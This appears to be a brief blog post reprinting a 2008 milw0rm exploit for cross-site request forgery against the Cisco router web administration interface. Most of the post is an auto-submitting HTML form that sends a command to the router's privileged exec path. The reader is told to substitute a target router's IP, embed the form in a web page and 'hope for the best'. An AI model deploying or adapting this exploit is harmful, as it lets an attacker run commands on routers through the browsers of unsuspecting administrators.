How to test Cisco Cross-Site Request Forgery

An article by Fabio Semperboni    No Comments

(No Ratings Yet)

Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit. Replace “10.10.10.1″ with the IP address of the target router, embed this in a web page and hope for the best. This is only for test use.

<html>
<body>

<body onload="asdf.submit();">

<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">

<input type=hidden name=command value="show privilege">

<input type=hidden name=command_url value="/level/15/exec/-">

</body>
</html>

# milw0rm.com [2008-09-17]